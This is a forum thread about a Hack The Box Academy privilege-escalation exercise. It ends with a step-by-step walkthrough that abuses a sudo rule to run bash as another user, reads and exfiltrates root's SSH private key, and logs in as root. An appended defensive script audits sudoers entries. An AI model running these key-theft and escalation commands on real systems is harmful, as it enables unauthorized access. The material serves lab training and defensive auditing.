Privilege Escalation

Hello Guys,

Need some quick help with the privilege escalation module question: “SSH into the server above with the provided credentials, and use the ‘-p xxxxxx’ to specify the port shown above. Once you login, try to find a way to move to ‘user2’, to get the flag in ‘/home/user2/flag.txt’.”

First I tried running the command $ sudo su user2, but I got the error “Sorry, user user1 is not allowed to execute ‘/usr/bin/su user2’”, so I think I need to escalate my privilege first.

I downloaded the linpeas.sh script on my original host, started an HTTP server on this host and tried to download the script on the remote server using the tun0 interface IP, but I am stuck now as the remote server can’t connect to the host and keeps timing out.

Any ideas on how to solve this question or what am I missing?

I haven’t done this module, so I don’t know the answer here; however, I can make some general comments.

  • I think moving from user1 to user2 is privilege escalation, I don’t think you need to elevate in order to move as such.
  • In general, enumeration is the key for Linux privesc. There are lots of ways to switch users and you can switch su without sudo.
  • Look for files with passwords such as bash history, configuration files, etc. This is often a good way to see if there are some credentials lying around you can reuse.
  • Check running processes to see if anything is badly configured.
  • Look for files your account shares with the target account (check group membership, then use something like find / -group WHATEVER 2>/dev/null to see what exists).
  • Look for files owned by the target account which are readable to you (find helps again).

As it is an academy box, there should be some clues/guidance in the training material around in the module.


Read the Hint — CHMOD

I believe this should help anyone who needs it. Please do not hesitate to write to me with questions.


Hi,
I’ve got one question:
Have you ever tried this yourself?
Because this → “Step 6: use this command to view the /flag.txt file, example; cat flag.txt”
does not work.
Regards

SORRY - DISREGARD PLEASE

It doesn’t work though, so what changed?

ssh user1@IP -p PORT
sudo -l
# we can see that /bin/bash of user2 is available
sudo -u user2 /bin/bash -c 'chmod 777 /home/user2/flag.txt'
# now we have access to flag.txt at /home/user2/flag.txt
sudo -u user2 /bin/bash -c 'cat /root/.ssh/id_rsa' > /home/user1/id_rsa
# now we have the private ssh key in our home directory
# then, from our HTB machine, we copy the private key over:
ssh user1@IP -p PORT 'cat /home/user1/id_rsa' > ~/id_rsa
chmod 600 id_rsa
ssh root@IP -p PORT -i id_rsa
whoami
# root
cat /root/flag.txt
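The enumeration advice earlier in the thread and the walkthrough above both come down to one sudo rule: user1 may run /bin/bash as user2. As an added example (not code from the thread or from HTB), here is a small POSIX sh audit that flags sudoers rules granting ALL or a shell/interpreter as another account, run against constructed sudoers text; the function names audit_sudoers and risky_count are mine.

```shell
#!/bin/sh
# Added example, not code from the thread: audit sudoers rules for entries that
# let one account run a shell (or ALL) as another account. That is the
# misconfiguration the final walkthrough above relies on ("sudo -u user2
# /bin/bash"), and it is what a defender should look for before anyone else does.

# Constructed sudoers content so the script runs offline. On a real host the
# input is /etc/sudoers plus /etc/sudoers.d/* (readable as root only).
SAMPLE_SUDOERS='# constructed sample, not a real policy
Defaults env_reset
Cmnd_Alias SERVICES = /usr/bin/systemctl
root    ALL=(ALL:ALL) ALL
user1   ALL=(user2) NOPASSWD: /bin/bash
user3   ALL=(ALL) /usr/bin/apt-get update
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /bin/sh
%admin  ALL=(ALL) ALL'

# audit_sudoers <sudoers text>: prints "<user> <runas> <command>" for each
# command that is ALL or a shell/interpreter (a short list; extend as needed).
audit_sudoers() {
    printf '%s\n' "$1" |
    grep -Ev '^[[:space:]]*(#|Defaults|[A-Za-z_]+_Alias)' |
    while IFS= read -r line; do
        user=$(printf '%s' "$line" | awk '{print $1}')
        runas=$(printf '%s' "$line" | sed -n 's/.*(\([^)]*\)).*/\1/p')
        # strip "user HOST=", the "(runas)" group and the NOPASSWD: tag
        cmds=$(printf '%s' "$line" |
            sed 's/^[^=]*=[[:space:]]*//; s/([^)]*)[[:space:]]*//; s/NOPASSWD:[[:space:]]*//')
        # a rule may list several commands separated by commas
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r entry; do
            cmd=$(printf '%s' "$entry" | sed 's/^[[:space:]]*//; s/[[:space:]].*//')
            case "$cmd" in
                ALL|*/sh|*/bash|*/zsh|*/dash|*/vi|*/vim|*/python*|*/perl)
                    printf '%s %s %s\n' "$user" "${runas:-root}" "$cmd" ;;
            esac
        done
    done
}

# risky_count <sudoers text>: number of flagged rules, handy for a compliance job.
risky_count() { audit_sudoers "$1" | wc -l | tr -d ' '; }

audit_sudoers "$SAMPLE_SUDOERS"
```

On the sample it reports the root and %admin catch-all rules, user1's bash-as-user2 rule and backup's /bin/sh, while leaving the apt-get and rsync entries alone.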